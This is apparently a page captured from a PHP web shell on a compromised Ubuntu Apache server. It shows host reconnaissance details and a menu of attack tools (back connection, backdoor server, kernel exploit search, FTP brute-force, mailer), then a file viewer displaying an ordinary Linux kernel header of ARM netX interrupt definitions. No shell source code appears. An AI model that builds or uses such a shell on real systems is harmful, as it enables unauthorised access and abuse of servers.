|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 21.39 GB of 70.42 GB (30.37%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
linux-headers-3.0.0-14/
arch/
arm/
mach-netx/
include/
mach/
- drwxr-xr-x
|
Viewing file: irqs.h (2.41 KB) -rw-r--r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
/* * arch/arm/mach-netx/include/mach/irqs.h * * Copyright (C) 2005 Sascha Hauer <s.hauer@pengutronix.de>, Pengutronix * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */
#define NETX_IRQ_VIC_START 0 #define NETX_IRQ_SOFTINT 0 #define NETX_IRQ_TIMER0 1 #define NETX_IRQ_TIMER1 2 #define NETX_IRQ_TIMER2 3 #define NETX_IRQ_SYSTIME_NS 4 #define NETX_IRQ_SYSTIME_S 5 #define NETX_IRQ_GPIO_15 6 #define NETX_IRQ_WATCHDOG 7 #define NETX_IRQ_UART0 8 #define NETX_IRQ_UART1 9 #define NETX_IRQ_UART2 10 #define NETX_IRQ_USB 11 #define NETX_IRQ_SPI 12 #define NETX_IRQ_I2C 13 #define NETX_IRQ_LCD 14 #define NETX_IRQ_HIF 15 #define NETX_IRQ_GPIO_0_14 16 #define NETX_IRQ_XPEC0 17 #define NETX_IRQ_XPEC1 18 #define NETX_IRQ_XPEC2 19 #define NETX_IRQ_XPEC3 20 #define NETX_IRQ_XPEC(no) (17 + (no)) #define NETX_IRQ_MSYNC0 21 #define NETX_IRQ_MSYNC1 22 #define NETX_IRQ_MSYNC2 23 #define NETX_IRQ_MSYNC3 24 #define NETX_IRQ_IRQ_PHY 25 #define NETX_IRQ_ISO_AREA 26 /* int 27 is reserved */ /* int 28 is reserved */ #define NETX_IRQ_TIMER3 29 #define NETX_IRQ_TIMER4 30 /* int 31 is reserved */
#define NETX_IRQS 32
/* for multiplexed irqs on gpio 0..14 */ #define NETX_IRQ_GPIO(x) (NETX_IRQS + (x)) #define NETX_IRQ_GPIO_LAST NETX_IRQ_GPIO(14)
/* Host interface interrupts */ #define NETX_IRQ_HIF_CHAINED(x) (NETX_IRQ_GPIO_LAST + 1 + (x)) #define NETX_IRQ_HIF_PIO35 NETX_IRQ_HIF_CHAINED(0) #define NETX_IRQ_HIF_PIO36 NETX_IRQ_HIF_CHAINED(1) #define NETX_IRQ_HIF_PIO40 NETX_IRQ_HIF_CHAINED(2) #define NETX_IRQ_HIF_PIO47 NETX_IRQ_HIF_CHAINED(3) #define NETX_IRQ_HIF_PIO72 NETX_IRQ_HIF_CHAINED(4) #define NETX_IRQ_HIF_LAST NETX_IRQ_HIF_CHAINED(4)
#define NR_IRQS (NETX_IRQ_HIF_LAST + 1)
|